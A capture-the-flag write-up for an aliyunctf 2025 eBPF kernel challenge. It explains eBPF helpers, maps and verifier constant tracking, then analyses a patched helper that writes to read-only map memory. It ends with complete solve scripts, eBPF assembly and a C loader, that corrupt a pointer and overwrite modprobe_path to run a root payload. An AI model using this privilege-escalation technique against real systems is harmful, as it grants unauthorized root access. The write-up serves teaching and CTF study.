This past weekend I played aliyunctf 2025 with the Friendly Maltese Citizens. There was a fun eBPF kernel pwn challenge that I spent far too long stuck on because I failed to realize one small detail (but still managed to get second blood :P).
#
background on bpfNOTE: any references to files or structures in the linux kernel are assumed to be based on linux version v6.6.
What is bpf? BPF stands for Berkley Packet Fitler and is a virtual instruction set used to execute small programs in the kernel. There are two flavors of bpf used in the kernel: cBPF and eBPF. Classic Berkley Packet Filter (cBPF) is is a 32 bit instruction set. Each register and all instructions are 32 bits wide, and it is mostly used to write seccomp syscall filters. Extended Berkley Packet Filter (eBPF) is a 64 bit instruction set and more widely used. eBPF is used to write programs that can perform socket filtering, network filtering, kernel probes, etc. The full list of program types can be found here: https://docs.ebpf.io/linux/program-type/.
eBPF is more powerful than cBPF, with persistent program storage, kernel helper functions, the ability to directly call kernel functions, etc. eBPF has the full capability to launch a kernel privilege escalation attack if it had full access to all the provided kernel functionality. For this reason eBPF is quite locked down for unprivileged users. There is a sysctl controlling whether unprivileged users are allowed to load eBPF programs kernel.unprivileged_bpf_disabled
, which is enabled on most major linux distros. Furthermore unprivileged users without the CAP_BPF
capability are unable to access the full range of ebpf helpers and are disallowed from accessing kernel functions.
static const struct bpf_verifier_ops * const bpf_verifier_ops[] = {
#define BPF_PROG_TYPE(_id, _name, prog_ctx_type, kern_ctx_type) \
[_id] = & _name ## _verifier_ops,
#define BPF_MAP_TYPE(_id, _ops)
#define BPF_LINK_TYPE(_id, _name)
#include <linux/bpf_types.h>
#undef BPF_PROG_TYPE
#undef BPF_MAP_TYPE
#undef BPF_LINK_TYPE
};
The eBPF helper resolution is performed based on the type of eBPF program loaded. This snippet of code in kernel/bpf/verifier.c
generates an array mapping the eBPF program type to a helper resolution function.
For example, this line in bpf_types.h
maps a program of BPF_PROG_TYPE_SOCKET_FILTER
to sk_filter_func_proto
.
static const struct bpf_func_proto *
sk_filter_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
{
switch (func_id) {
case BPF_FUNC_skb_load_bytes:
return &bpf_skb_load_bytes_proto;
case BPF_FUNC_skb_load_bytes_relative:
return &bpf_skb_load_bytes_relative_proto;
case BPF_FUNC_get_socket_cookie:
return &bpf_get_socket_cookie_proto;
case BPF_FUNC_get_socket_uid:
return &bpf_get_socket_uid_proto;
case BPF_FUNC_perf_event_output:
return &bpf_skb_event_output_proto;
default:
return bpf_sk_base_func_proto(func_id);
}
}
#
eBPF mapseBPF maps is a storage method provided by the linux kernel to storage persistent information between runs of the eBPF program, between different programs, and to share data from userspace for the program to access. The full list of eBPF maps types can be found at https://docs.ebpf.io/linux/map-type/.
#
compiling eBPF programsThere are 3 ways that I currently know of to generate eBPF programs:
The method I chose to generate my eBPF exploit in this challenge is to write eBPF assembly and assemble to bytecode using zig.
This is an example of a small eBPF program that looks up a value in the map referenced by fd 10 using the key 0. Currently the Zig backend for eBPF uses llvm, which defaults to a style of eBPF known as pseudoc.
The eBPF target is bpfel-freestanding-none
, and once compiled into an elf object the bytecode can be extracted with objcopy. xxd -i
converts a binary file into an array of bytes that can be included in a c file using the #include
directive.
#
eBPF map pointersInside of an eBPF program, maps are referenced by special types called map ptrs. Map ptrs are loaded into registers using a variant of the ld64 instruction. Normally ld64 is used to load a 64 bit immediate number into a register, but if the src field of the ld64 instruction is set to 1 the kernel will instead interpret the immediate as a file descriptor and load a reference to the appropriate map ptr. This can be accomplished in assembly with:
ld_pseudo [reg], 1, [fd]
#
calling eBPF helpersBy default, call instructions are interpreted as requests for eBPF helpers. The immediate field of the call instruction is used to determine which eBPF helper to call. For example, call 1
invokes BPF_FUNC_map_lookup_elem
. The full list of eBPF helpers cal be found in enum bpf_fund_id
at <linux/bpf.h>
.
#
other call variantsThere are two other types of call instructions, based on the value of the src field. Subprogram calls use src = 1
and kernel functions use src = 2
. To my knowledge there is not an assembly variant of the call instruction that allows control of the src field. Instead a macro can be used instead that directly encodes the value of the src field.
The different processing of the call variants can be found at kernel/bpf/verifier.c:16655
.
#
JIT compilationeBPF has two modes of execution, interpreted and jit compiled.
JIT compilation is controlled by this set of kernel config options. With CONFIG_BPF_JIT_ALWAYS_ON
set, eBPF programs are always JIT compiled by the kernel. The program is JIT compiled by the function bpf_int_jit_compile
at kernel/bpf/core.c
.
void bpf_prog_jit_attempt_done(struct bpf_prog *prog)
It is possible to dump the JIT compiled program by setting a breakpoint at bpf_prog_jit_attempt_done
and dumping the instructions at fp->bpf_func
(or $rdi+0x30
on x86_64).
#
challenge explorationThe challenge involves a patch to linux version v6.6.74
to add a new eBPF helper function:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263
diff --color -ruN origin/include/linux/bpf.h aliyunctf/include/linux/bpf.h
--- origin/include/linux/bpf.h 2025-01-23 10:21:19.000000000 -0600
+++ aliyunctf/include/linux/bpf.h 2025-01-24 03:44:01.494468038 -0600
@@ -3058,6 +3058,7 @@
extern const struct bpf_func_proto bpf_user_ringbuf_drain_proto;
extern const struct bpf_func_proto bpf_cgrp_storage_get_proto;
extern const struct bpf_func_proto bpf_cgrp_storage_delete_proto;
+extern const struct bpf_func_proto bpf_aliyunctf_xor_proto;
const struct bpf_func_proto *tracing_prog_func_proto(
enum bpf_func_id func_id, const struct bpf_prog *prog);
diff --color -ruN origin/include/uapi/linux/bpf.h aliyunctf/include/uapi/linux/bpf.h
--- origin/include/uapi/linux/bpf.h 2025-01-23 10:21:19.000000000 -0600
+++ aliyunctf/include/uapi/linux/bpf.h 2025-01-24 03:44:11.814636836 -0600
@@ -5881,6 +5881,7 @@
FN(user_ringbuf_drain, 209, ##ctx) \
FN(cgrp_storage_get, 210, ##ctx) \
FN(cgrp_storage_delete, 211, ##ctx) \
+ FN(aliyunctf_xor, 212, ##ctx) \
/* */
/* backwards-compatibility macros for users of __BPF_FUNC_MAPPER that don't
diff --color -ruN origin/kernel/bpf/helpers.c aliyunctf/kernel/bpf/helpers.c
--- origin/kernel/bpf/helpers.c 2025-01-23 10:21:19.000000000 -0600
+++ aliyunctf/kernel/bpf/helpers.c 2025-01-24 03:44:06.683490095 -0600
@@ -1745,6 +1745,28 @@
.arg3_type = ARG_CONST_ALLOC_SIZE_OR_ZERO,
};
+BPF_CALL_3(bpf_aliyunctf_xor, const char *, buf, size_t, buf_len, s64 *, res) {
+ s64 _res = 2025;
+
+ if (buf_len != sizeof(s64))
+ return -EINVAL;
+
+ _res ^= *(s64 *)buf;
+ *res = _res;
+
+ return 0;
+}
+
+const struct bpf_func_proto bpf_aliyunctf_xor_proto = {
+ .func = bpf_aliyunctf_xor,
+ .gpl_only = false,
+ .ret_type = RET_INTEGER,
+ .arg1_type = ARG_PTR_TO_MEM | MEM_RDONLY,
+ .arg2_type = ARG_CONST_SIZE,
+ .arg3_type = ARG_PTR_TO_FIXED_SIZE_MEM | MEM_UNINIT | MEM_ALIGNED | MEM_RDONLY,
+ .arg3_size = sizeof(s64),
+};
+
const struct bpf_func_proto bpf_get_current_task_proto __weak;
const struct bpf_func_proto bpf_get_current_task_btf_proto __weak;
const struct bpf_func_proto bpf_probe_read_user_proto __weak;
@@ -1801,6 +1823,8 @@
return &bpf_strtol_proto;
case BPF_FUNC_strtoul:
return &bpf_strtoul_proto;
+ case BPF_FUNC_aliyunctf_xor:
+ return &bpf_aliyunctf_xor_proto;
default:
break;
}
This patch adds an extra eBPF helper function. The helper itself is simple, it takes an 8 byte long buffer, xors it with 2025, and writes it to a different 8 byte result memory location. The interesting part of this patch is that the result argument is marked with MEM_RDONLY
, even though the xor function modifies it.
I won't talk about the eBPF verifier too much here. Some good reading to do is:
Since the value inside of readonly maps can't change, the verifier can assume that registers that loads from readonly maps will hold the exact value in the map. However since the bpf_aliyunctf_xor
helper is allowed to modify read only memory, we can break the assumption. We can trick the verifier into thinking that a value is some number X
when it is actually Y
.
static bool bpf_map_is_rdonly(const struct bpf_map *map)
{
/* A map is considered read-only if the following condition are true:
*
* 1) BPF program side cannot change any of the map content. The
* BPF_F_RDONLY_PROG flag is throughout the lifetime of a map
* and was set at map creation time.
* 2) The map value(s) have been initialized from user space by a
* loader and then "frozen", such that no new map update/delete
* operations from syscall side are possible for the rest of
* the map's lifetime from that point onwards.
* 3) Any parallel/pending map update/delete operations from syscall
* side have been completed. Only after that point, it's safe to
* assume that map value(s) are immutable.
*/
return (map->map_flags & BPF_F_RDONLY_PROG) &&
READ_ONCE(map->frozen) &&
!bpf_map_write_active(map);
}
Something to note is that in order to create a readonly bpf map, the BPF_F_RDONLY_PROG
flag must be set when creating the map. BPF_F_RDONLY_PROG
disallows the eBPF program from modifying the map. But the userland program can still modify the map so the kernel can't consider the map to be readonly yet. Once the map is populated with values from userland, it can be frozen using BPF_MAP_FREEZE
to disallow further modification by the userland program. Now the map can be considered readonly and the verifier can perform constant optimziation.
I probably spent at least 12 hours trying to figure out why the verifier wasn't doing constant optimization only to realize that I hadn't frozen the map.
In manf's writeup, they abuse map ptrs to achieve out bounds read/write and eventually privilege escalation. But from my testing, this no longer works in modern versions of linux. The verifier and JIT compiler seem to treat operations on map ptrs differently. If a register is added to a map ptr that is a known constant number, the compiler will emit sequence of instruction that will directly add that number instead of using the register. This means that if the verifier knows that a register holds the value X
it will emit assembly that simply adds the constant X
directly to the map ptr, even though theoretically at runtime if it was using a register instead the value would be different.
The google blog post takes a different approach. When not operating on map ptrs, even though the compiler knows a register holds a constant value it does not optimize it into a direct constant and uses the value of the register. This can be abused in combination with eBPF helpers.
// Put a ptr to skb (network packet) in r1
r1 = ptr_to_packet
// Set offset = 0
r2 = 0
// Set to = stack_ptr - 40
r3 = r10 - 40
// Verifier thinks len = 0, in reality len = 8.
r4 = r6
// len = len + 8, verifier thinks len = 8 so it deems it safe, in reality len = 16
r4 += 8
// Set start_header = 1
r5 = 1
// assuming r8 holds a pointer to memory
*(u64 *)(r3 + 8) = r8
BPF_FUNC_skb_load_bytes_relative(r1, r2, r3, r4, r5)
Here we trick the verifier into thinking a value is 0 during verification, but at runtime will be 8 (verif=0, runtime=8). Adding 8 to this value yields (verif=8, runtime=16). This corrupted length can be passed into skb_load_bytes_relative
which reads data from a network packet, which we have control over. The verifier thinks the bytes at r3+0 to r3+8 are written to by skb_load_bytes_relative
when it is really writing to r3+0 to r3+16, corrupting the pointer at r3+8. Now the pointer at r3+8 points to some arbitrary attacker controlled value and the verifier thinks the pointer is still safe to use. Since KASLR is turned off we simply overwrite modprobe_path
for privilege escalation and read the flag.
#
solve scriptsbuild:
mkdir -p zig-out
zig cc probe.S -target bpfel-freestanding-none -c -o zig-out/probe.o
objcopy -O binary zig-out/probe.o zig-out/probe.bin
xxd -i zig-out/probe.bin > probe.h
zig cc test.c -target x86_64-linux-musl -static -o teemo -Os -s -no-pie
cp teemo rootfs/bin/teemo
chmod +x rootfs/bin/teemo
pwnc kernel compress
llvm-objdump -d zig-out/probe.o
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162
#define XOR 212
#define MAP_LOOKUP_ELEM 1
#define SKC_TO_UNIX 178
#define DYNPTR_FROM_MEM 197
#define THIS_CPU 154
#define STRTOL 105
#define LOAD_RELATIVE 68
#define RDONLY_MAP 3
#define fp r10
.macro mptr reg, fd
ld_pseudo \reg, 1, \fd
.endm
_start:
r9 = r1
mptr r1, 3
r2 = fp
r2 += -8
*(u64 *)(r2 + 0) = 0
call MAP_LOOKUP_ELEM
if r0 == 0 goto done1
r7 = r0
mptr r1, 4
r2 = fp
r2 += -8
*(u64 *)(r2 + 0) = 0
call MAP_LOOKUP_ELEM
if r0 == 0 goto done1
r8 = r0
r1 = *(u64 *)(r7 + 0)
r3 = r7
r2 = 8
r1 = fp
r1 += -16
*(u64 *)(r1 + 0) = 8 ^ 2025
call XOR
r5 = 1
r4 = *(u64 *)(r7 + 0)
r4 += 8
r3 = fp
r3 += -16
*(u64 *)(r3 + 8) = r8
r2 = 0
r1 = r9
call LOAD_RELATIVE
r8 = *(u64 *)(fp - 8)
r1 = 0x782f706d742f ll
*(u64 *)(r8 + 0) = r1
r0 = 13
exit
done1:
r0 = 1
exit
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156
#define _GNU_SOURCE
#include "bpf_insn.h"
// #include <bpf/bpf.h>
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <poll.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
#define try(expr) \
({ \
int _i = (expr); \
if (0 > _i) { \
errx(1, "error at %s:%d: returned %d, %s\n", __FILE__, __LINE__, \
_i, strerror(errno)); \
} \
_i; \
})
#define warn(expr) \
({ \
int _i = (expr); \
if (0 > _i) { \
printf("pwn: error at %s:%d: returned %d, %s\n", __FILE__, \
__LINE__, _i, strerror(errno)); \
} \
_i; \
})
#define BPF_LOG_BUF_SIZE (UINT32_MAX >> 8)
char bpf_log_buf[BPF_LOG_BUF_SIZE];
static int bpf_program_load(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version) {
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (uint64_t)insns,
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = (uint64_t)license,
.log_buf = (uint64_t)bpf_log_buf,
.log_size = BPF_LOG_BUF_SIZE,
.log_level = 10,
};
attr.kern_version = kern_version;
bpf_log_buf[0] = 0;
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
static int bpf_create_map(enum bpf_map_type map_type, int key_size,
int value_size, int max_entries) {
union bpf_attr attr = {.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
static int bpf_create_rdonly_map(enum bpf_map_type map_type, int key_size,
int value_size, int max_entries) {
union bpf_attr attr = {.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
.map_flags = BPF_F_RDONLY_PROG};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
static int bpf_update_elem(int fd, void *key, void *value, uint64_t flags) {
union bpf_attr attr = {
.map_fd = fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
static int bpf_lookup_elem(int fd, void *key, void *value) {
union bpf_attr attr = {
.map_fd = fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
};
return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
static int bpf_map_freeze(int fd) {
union bpf_attr attr;
memset((void *)&attr, 0, sizeof(attr));
attr.map_fd = fd;
return syscall(__NR_bpf, BPF_MAP_FREEZE, &attr, sizeof(attr));
}
#include "probe.h"
int main() {
// create readonly bpf map
int map_fd = try(bpf_create_rdonly_map(BPF_MAP_TYPE_ARRAY, 4, 8, 1));
printf("map_fd = %d\n", map_fd);
char other_val[4000];
memset(&other_val, 0, sizeof(other_val));
int other = try(bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, sizeof(other_val), 1));
printf("map_fd = %d\n", other);
// put value in map
int key = 0;
long value = 0;
try(bpf_update_elem(map_fd, &key, &value, 0));
try(bpf_map_freeze(map_fd));
try(bpf_update_elem(other, &key, &other_val, 0));
struct bpf_insn *exploit = (struct bpf_insn *)&zig_out_probe_bin;
int exploit_len = zig_out_probe_bin_len;
int progfd = bpf_program_load(BPF_PROG_TYPE_SOCKET_FILTER, exploit,
exploit_len, "", 0);
printf("log = %s\n", bpf_log_buf);
printf("progfd = %d\n", progfd);
int sockets[2];
try(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets));
try(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd,
sizeof(progfd)));
long buffer[4];
buffer[1] = 0xffffffff82b3f6c0;
ssize_t n = write(sockets[0], buffer, sizeof(buffer));
printf("written = %ld\n", n);
n = read(sockets[1], buffer, sizeof(buffer));
printf("read = %ld\n", n);
int fd = open("/tmp/x", O_CREAT | O_RDWR, 0777);
char payload[] = "#!/bin/sh\ncp /flag /tmp/flag\nchmod 777 /tmp/flag\n";
write(fd, &payload, sizeof(payload));
close(fd);
fd = open("/tmp/t", O_CREAT | O_RDWR, 0777);
long nulls[1];
memset(&nulls, 0, sizeof(nulls));
write(fd, &nulls, sizeof(nulls));
close(fd);
system("/tmp/t");
return 0;
}